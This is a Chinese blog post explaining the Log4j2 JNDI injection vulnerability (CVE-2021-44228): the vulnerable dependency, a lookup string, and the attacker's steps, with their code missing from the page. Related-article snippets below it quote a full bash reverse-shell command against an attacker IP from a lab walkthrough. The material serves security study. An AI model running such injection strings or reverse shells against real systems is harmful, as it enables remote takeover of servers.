log4j2高危漏洞原理分析

最新推荐文章于 2025-03-17 12:40:26 发布
最新推荐文章于 2025-03-17 12:40:26 发布
阅读量3.4k 收藏 1
点赞数 1
分类专栏: java 漏洞 文章标签: log4j2 log4j2高危漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/gejiangbo222/article/details/122082398
版权

原理分析

了解2.15版本前log4j2可输出变量

首先新建一个maven项目,加入log4j2的代码,我们用maven方式,只需要引入这两个pom依赖即可

        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.12.0</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.12.0</version>
        </dependency>

随便写一段日志打印

当然你也可以写一个变量,将它输出

假如你的系统在登录的时候,用log4j框架记录了用户名,那么,我输入${java:vm},实质上你会打印出java相关的vm信息,而非${java:vm}。

当然黑客比较聪明,他们会通过一些手段抓取你哪些地方有log4j的打印,比如通过不断试错接口,比如采用dnslog方式进行扫描,探测,一旦抓到系统报错,分析可以利用,就可以进行他的下一步动作了。(这里是另外的技术,不展开讲)

通过jndi注入

上边说到log4j2可以输出变量,那么什么变量可以被利用执行远端代码呢,此次发现的黑客利用的注入方式就是jndi注入了。

如果你是一名黑客,想攻击某台含有log4j漏洞服务器的流程如下:

1.构建破坏代码

这段代码当中的命令,是删除/home/data/test/目录下的所有文件。

当然黑客一般会写一些更复杂的脚本,把你的服务器变成他的矿机,不定时重启你的机器等等。

2.构建中间服务器

一般会启动这样一个服务监听,黑客肯定又更高明的写法,这里只是模拟。

这个方法的意思是,打开7008端口监听,如果有访问,则拿到factoryLocation/factory下的RmiTest引用。

3.构建注入语句

以上代码为模拟,实际情况,可能是掉个接口,或者表单直接输入,当然以上的ip也会更换成黑客的服务器ip。

如此依赖便可在你漏洞机器上执行到1当中的脚本,完成一次完整的攻击。

攻击链路总结

黑客找到漏洞,构建自己的破坏脚本和舰艇服务,黑客通过构建jndi解析语句,将自己远程的类执行到你当前的java服务中。

Log4j2的JNDI注入漏洞原理分析与思考
uuuyy_的博客
12-23 2898
前言 最近Log4j2的JNDI注入漏洞(CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现和分析其形成原理。在此分享。 以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。 一、 前置知识 1.1 Log4j2 Log4j2是一个Java日志组件,被各类Java框架广泛地使用。它的前身是Log4jLog4j2重新构建和设计了框架,可以认为两者是完全独立的两个日志组
log4j2漏洞原理简述
xianyu9w的博客
04-02 6836
影响版本 Apache Log4j 2.x <= 2.14.1 jdk不知道,有知道的师傅麻烦告诉下 漏洞原理 由于Apache Log4j存在递归解析功能(lookup),未取得身份认证的用户,可以从远程发送数据请求输入数据日志,轻松触发漏洞,最终在目标上执行任意代码。 lookup相当于是一个接口,具体去哪里查找,怎么查找,就需要编写具体的模块去实现了,类似于面向对象编程中多态那意思。单单lookup的话打印一些服务器信息什么的危害倒是不大,但是加上JNDI就有意思了。 JNDI(Java Na
CVE重要漏洞复现之Log4J漏洞原理与实现(网络安全学习)
最新发布
没有网络安全就没有国家安全
03-17 1212
CVE重要漏洞复现之Log4J漏洞原理与实现
Log4j2注入漏洞(CVE-2021-44228)万字深度剖析(二)—漏洞原理
跳小闹成长记
12-14 1万+
本文将和大家一起对Log4j2漏洞进行全面深入的剖析。我们将从如下几个方面进行讲解。 1、Log4j2漏洞的基本原理 2Log4j2漏洞Java高低版本中的不同攻击原理 3、Log4j2漏洞Java高低版本中的攻击步骤 4、Log4j2漏洞2.15.0-RC1中被绕过的原因 5、Log4j2最终修复方案(2.15.0)的原理
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
热门推荐
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Apache Log4j2 漏洞原理
m0_49025459的博客
06-26 2174
Apache Log4j被发现存在一处任意代码执行漏洞,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。经验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等众多组件与大型应用均受影响。
log4j2核弹级漏洞原理分析
2401_84411847的博客
04-19 1045
起因这两天被log4j2漏洞给刷屏了,就像下面这样但是很少有人提及这个漏洞到底是怎么回事儿。log4j2最为非常顶尖的日志框架,怎么会出现这种级别的漏洞呢?了解过漏洞原理之后我发现,这应该算是一种低级漏洞了。原理就是。
Apache Log4j2高危漏洞解决方案(新)
qianshanding0708的博客
12-11 2242
更多内容关注微信公众号:fullstack888漏洞级别严重影响版本Apache Log4j 2.x < 2.15.0-rc2影响范围spring-boot-starter-log4...
log4j2漏洞终极解决方法 apache-log4j-2.16.0-bin.zip
12-14
本文将深入探讨Log4j2漏洞原理、影响范围以及如何进行有效的修复。 Apache Log4j2是一款广泛应用于Java应用程序的日志记录框架,它允许开发者方便地记录程序运行过程中的各种信息,便于调试和监控。然而,由于其...
Log4j漏洞复现及原理(附github源码)
weixin_42478399的博客
02-15 5765
1.背景 之前在公司收到Log4j2爆出一个重大漏洞,公司有大部分应用使用到了Log4j2.14.0以下的版本,全公司内部程序员收到消息之后,加班加点升级Log4j的版本到2.14.1(这个版本也不稳定),在此记录一下。 2.Log4j的重大漏洞 我们复现一下Log4j 2.14.0版本中出现的安全问题。首先,我们新建一个Maven项目,引入Log4j的jar <?xml version="1.0" encoding="UTF-8"?> <project xmlns="htt
Apache Log4j2.x RCE命令执行漏洞攻击原理及修复措施
wangpf2011的博客
12-23 4040
截止2021.12.20,短短几天Log4j2.x已经连发3个版本,用以修复RCE命令执行漏洞Log4j2漏洞总体来说是通过JNDI注入恶意代码来完成攻击,具体的操作方式有RMI和LDAP等。 一、攻击原理 以RMI为例,简单阐述下该漏洞的攻击原理: 1、攻击者首先发布一个RMI服务,此服务将绑定一个引用类型的RMI对象。在引用对象中指定一个远程的含有恶意代码的类。 2、攻击者再发布另一个恶意代码下载服务,此服务可以下载所有含有恶意代码的类。 3、攻击者利用Log4j2漏洞注入RMI调用,
Log4J2漏洞(CVE-2021-44228)原理
m0_62466350的博客
05-07 3745
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发 者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏 洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶 意请求,触发远程代码执行漏洞,从而获得目标服务器权限。漏洞适应版本:2.0
Log4J2漏洞(CVE-2021-44228)原理_log4j2漏洞原理
m0_60453176的博客
04-08 872
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发 者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏 洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶 意请求,触发远程代码执行漏洞,从而获得目标服务器权限。漏洞适应版本:2.0
log4j2漏洞原理分析及复现-CVE-2021-44228 (vulfocus靶场)
yang1234567898的博客
04-18 3377
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
Log4j2漏洞(一)原理和dnslog验证
02-06 2407
Log4j2漏洞(一)介绍漏洞前景、漏洞原理、确定注入点和dnslog验证
log4j2漏洞原理及修复方案
weixin_41701609的博客
12-13 8406
log4j2漏洞原理log4j2修复方案
log4j2漏洞原理详解、漏洞复现及漏洞利用
Cwillchris的博客
03-13 1511
虽然/dev/tcp/${HOST}/${PORT}这个字符虽然看起来像一个文件系统中的文件,并且位于/dev这个设备文件夹下,但是这个文件并不存在,并且不是一个设备文件。这只是 bash 实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入 host port 参数,就能发起一个 socket 连接。这两组重定向,将输入,输出,报错信息都输入到/dev/tcp/192.168.1.3/6666 这里了,就相当于把整个 shell 会话,都重定向到 tcp 连接中了。
Log4j2 高危漏洞分析
石宗昊的博客
12-13 2636
博主其他文章 Apache Log4j2 远程代码执行高危漏洞 解决方案 视频出自 https://space.bilibili.com/1707194509?spm_id_from=333.788.b_765f7570696e666f.2 相关视频 Log4j高危漏洞!具体原因解析!全网第一! Log
Log4j2 远程代码执行漏洞(cve-2021-44228)原理剖析
Hi~ 土拨鼠
12-17 6428
文章目录1、JNDI、RMI、LDAP、JNDI注入?Log4j2 rce原理影响版本修复思路 要了解本次Log4j2 rce的原理,首先我们得知道什么是JNDI,什么是JNDI注入,什么是RMI,什么又是LDAP… 本文中只讲原理,具体复现请转至:Log4j2 远程代码执行漏洞(cve-2021-44228)复现(反弹shell) 1、JNDI、RMI、LDAP、JNDI注入? Java Name and Directory Interface:java命名和目录接口 是sun公司提供的一种标准的java
Apache Log4j 2.16.0远程代码执行漏洞紧急修复升级
2. CVE-2021-44228是Log4j 2.x版本中被发现的一个严重的远程代码执行漏洞。 3. 漏洞利用原理是攻击者通过输入特定格式的数据到日志消息中,触发了库中的JNDI功能,进而执行远程代码。 4. Log4j 2.16.0版本修复了此...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值